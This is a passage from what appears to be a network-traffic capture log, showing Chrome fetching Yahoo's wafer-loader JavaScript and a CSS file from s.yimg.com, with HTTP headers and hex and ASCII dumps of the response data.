                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 2a 36 20 47 01 16 7c b5 a2 e0 34 c4 4a 6c 38 03 9d 34 88 33 47 d0 f3 9e 42 cf 8e 9e 73 32 9c a0 2a b9 54 d6 94 92 8d a2 4d cd 36 3a 4d 3b 90 9d 1b cb 6e 64 6f a1 52 3b 66 67 fd 1e aa 93 0e d6 34 f7 5b 10 55 bd 4d 58 58 51 00 da 7b 58 7b fa 10 68 f7 c7 7c 7b 43 75 a9 d0 e3 61 8c a6 c9 b0 29 17 f4 2d 25 be 35 84 6d e3 5c a6 13 1d fc 16 f7 89 8a ba 1c 4d 44 51 8a 59 ad db f6 db f6 9b 7e 0e 5b 41 7e d0 55 b9 b6 6a 08 88 7a 20 d0 45 c2 c3 f2 65 38 15 2e ee 00 44 42 b3 f1 46 99 4e 3e 41 c1 1c 7a c5 24 9b 76 00 fb d1 11 53 5f 6c 07 b9 b5 3d a6 5a 53 95 5c 4d e4 01 98 b6 2e 54 73 f3 a1 bb 9c 36 93 17 13 b5 04 69 e5 81 87 da db e6 b2 2f 36 e2 01 ad 50 b1 d2 82 60 19 a4 3d cf 67 3e d7 fd 04 b8 0b b8 84 0c 17 15 43 82 c8 2f 10 11 2f 11 c2 52 1d 0b 07 61 c3 a5 87 06
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: *6 G|4Jl843GBs2*TM6:M;ndoR;fg4[UMXXQ{X{h|{Cua)-%5m\MDQY~[A~Ujz Ee8.DBFN>Az$vS_l=ZS\M.Ts6i/6P`=g>C//Ra


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              37192.168.2.45105687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC540OUTGET /aaq/wf/wf-loader-2.7.21-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: MLSsfc4UrbAeCN9447R30KOT3aJjj959hJGVzqUyG5uzgdSkN/jMxlEx6yxIT3pSPAE5GjlxVOc=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: E92Z1DSBVZ98CXZ1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 26 Sep 2024 07:48:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "59ae89307f6be51355e07acf3994f79b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: ODQdcT.d6AiA15hD8NatovEvfsHYFam9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1077876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 6f 61 64 65 72 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 6f 61 64 65 72 22 5d 3d 65 28 29 3a 28 61 2e 77 61 66 65 72 3d 61 2e 77 61 66 65 72 7c 7c 7b 7d 2c 61 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 61 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 63 74 69 6f 6e 2d 31 2e 38 2e 31 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 63 74 69 6f 6e 2d 31 2e 38 2e 31 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 33 31 2e 38 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 31 2e 33 31 2e 38 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 31 2e 33 31 2e 38 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :"/aaq/wf/wf-action-1.8.1.js",raw:"/aaq/wf/wf-action-1.8.1.raw.js"}},"wafer-autocomplete":{meta:{version:"1.31.8"},modern:{min:"/aaq/wf/wf-autocomplete-1.31.8-modern.js",raw:"/aaq/wf/wf-autocomplete-1.31.8-modern.raw.js"},default:{min:"/aaq/wf/wf-autocomp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 63 6f 72 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 36 35 2e 31 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 35 2e 31 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 35 2e 31 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: js"},default:{min:"/aaq/wf/wf-clipboard-copy-1.0.2.js",raw:"/aaq/wf/wf-clipboard-copy-1.0.2.raw.js"}},"wafer-core":{meta:{version:"1.65.1"},modern:{min:"/aaq/wf/wf-core-1.65.1-modern.js",raw:"/aaq/wf/wf-core-1.65.1-modern.raw.js"},default:{min:"/aaq/wf/wf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 64 72 6f 70 64 6f 77 6e 2d 64 72 61 77 65 72 2d 31 2e 31 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 64 72 6f 70 64 6f 77 6e 2d 64 72 61 77 65 72 2d 31 2e 31 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 65 78 70 65 72 69 6d 65 6e 74 2d 73 63 72 6f 6c 6c 76 69 65 77 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 65 78 70 65 72 69 6d 65 6e 74 2d 73 63 72 6f 6c 6c 76 69 65 77 2d 31 2e 32 2e 31 30 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 65 78 70 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: modern.raw.js"},default:{min:"/aaq/wf/wf-dropdown-drawer-1.1.3.js",raw:"/aaq/wf/wf-dropdown-drawer-1.1.3.raw.js"}},"wafer-experiment-scrollview":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-experiment-scrollview-1.2.10-modern.js",raw:"/aaq/wf/wf-exper
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 69 6d 61 67 65 2d 31 2e 34 2e 30 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 31 30 2e 36 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {version:"1.4.0"},modern:{min:"/aaq/wf/wf-image-1.4.0-modern.js",raw:"/aaq/wf/wf-image-1.4.0-modern.raw.js"},default:{min:"/aaq/wf/wf-image-1.4.0.js",raw:"/aaq/wf/wf-image-1.4.0.raw.js"}},"wafer-lightbox":{meta:{version:"1.10.6"},modern:{min:"/aaq/wf/wf-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 70 72 6f 67 72 65 73 73 2d 6c 6f 61 64 65 72 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n:{min:"/aaq/wf/wf-native-da-1.0.5-modern.js",raw:"/aaq/wf/wf-native-da-1.0.5-modern.raw.js"},default:{min:"/aaq/wf/wf-native-da-1.0.5.js",raw:"/aaq/wf/wf-native-da-1.0.5.raw.js"}},"wafer-progress-loader":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 2e 31 32 2e 36 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 33 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 78 74 22 3a 7b 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .12.6.raw.js"}},"wafer-template":{meta:{version:"1.4.3"},modern:{min:"/aaq/wf/wf-template-1.4.3-modern.js",raw:"/aaq/wf/wf-template-1.4.3-modern.raw.js"},default:{min:"/aaq/wf/wf-template-1.4.3.js",raw:"/aaq/wf/wf-template-1.4.3.raw.js"}},"wafer-text":{me
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 6f 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 33 2e 32 2e 32 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 7d 7d 2c 22 2e 2f 73 72 63 2f 65 6e 74 72 79 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o":{meta:{version:"3.2.2"},modern:{min:"/aaq/wf/wf-video-3.2.2-modern.js",raw:"/aaq/wf/wf-video-3.2.2-modern.raw.js"},default:{min:"/aaq/wf/wf-video-3.2.2.js",raw:"/aaq/wf/wf-video-3.2.2.raw.js"}}}},"./src/entry.js":function(a,e,r){"use strict";function w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 65 72 6e 3a 21 30 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 7d 2c 72 6f 6f 74 3a 73 7d 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 30 29 7d 29 2c 74 68 69 73 2e 73 79 6e 63 28 29 7d 72 65 74 75 72 6e 20 66 28 61 2c 5b 7b 6b 65 79 3a 22 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 72 3d 5b 5d 3b 6a 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 77 29 7b 76 61 72 20 66 3d 6c 5b 77 5d 7c 7c 77 2c 6f 3d 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ern:!0,successClass:i},root:s},window.wafer.ready(function(){setTimeout(function(){e.loadWafersForWrapperElem(document)},0)}),this.sync()}return f(a,[{key:"loadWafersForWrapperElem",value:function(a){var e=this,r=[];j.forEach(function(w){var f=l[w]||w,o=w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC201INData Raw: 65 74 28 6c 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 6f 28 29 3b 65 5b 72 5d 3d 21 30 2c 6e 2e 5f 61 73 73 65 74 4c 6f 61 64 65 64 4d 61 70 70 69 6e 67 2e 73 65 74 28 6c 2c 21 30 29 2c 69 28 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 22 2b 6c 7d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 65 5b 72 5d 3d 21 31 2c 61 29 72 65 74 75 72 6e 20 76 6f 69 64 20 73 28 61 29 3b 6f 28 29 7d 29 7d 29 7d 29 29 7d 7d 5d 29 2c 61 7d 28 29 2c 70 3d 71 3b 65 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 70 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: et(l))return void o();e[r]=!0,n._assetLoadedMapping.set(l,!0),i({src:"https://s.yimg.com"+l},function(a){if(e[r]=!1,a)return void s(a);o()})})}))}}]),a}(),p=q;e.default=new p({selector:".wafer"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              38192.168.2.45106187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC599OUTGET /pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: Wyy1UdymSS9tUni6tOUvqdOZjLKoxLWWXrHhJuNUPfu0LYyOUmiBXS5xNLGXYeoFnw1sVz0BChE=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: JGBAANBHSPX78DD3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 20:19:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 12 Jun 2024 01:40:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "e1026852c4e85d7df641ed51990b2993"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 9985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 82449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 42 64 5c 28 6e 5c 29 2c 2e 42 64 5c 28 6e 5c 29 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 5c 24 73 72 63 68 46 75 6a 69 44 69 72 74 79 53 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 2c 23 65 30 65 34 65 39 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 74 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 5c 23 30 30 35 37 62 38 5c 29 5c 3a 5c 3a 62 3a 3a 62 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #atomic .Ai\(c\){align-items:center}#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(\$srchFujiDirtySeagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull,#e0e4e9)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdendc\(\#0057b8\)\:\:b::be
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1300INData Raw: 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 31 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 32 70 78 5c 29 5c 3a 5c 3a 62 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 33 30 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 65 6e 64 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 73 74 61 72 74 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c
